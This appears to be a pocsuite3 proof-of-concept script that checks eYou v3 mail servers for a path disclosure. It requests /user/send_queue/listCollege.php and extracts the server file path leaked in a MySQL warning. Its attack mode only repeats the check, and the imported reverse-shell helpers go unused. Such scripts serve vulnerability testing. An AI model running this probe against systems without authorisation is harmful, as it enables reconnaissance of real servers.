"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
import re
class DemoPOC(POCBase):
vulID = '1293' # ssvid
version = '1'
author = ['chenghs@knownsec.com']
vulDate = '2012-02-23'
createDate = '2014-05-27'
updateDate = '2014-05-27'
references = ['']
name = 'eYou v3 listCollege.php 路径泄漏漏洞 POC'
appPowerLink = 'http://www.eyou.com/'
appName = 'eYou'
appVersion = '3#'
vulType = 'Path Disclosure'
desc = '''
eYou/user/send_queue/listCollege.php导致泄漏文件路径信息。
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
verify_url = self.url + "/user/send_queue/listCollege.php"
r = requests.get(verify_url)
page_content = r.text
res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')
match = res.findall(page_content)
if match and '<b>Warning</b>:' in page_content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
register_poc(DemoPOC)
暂无评论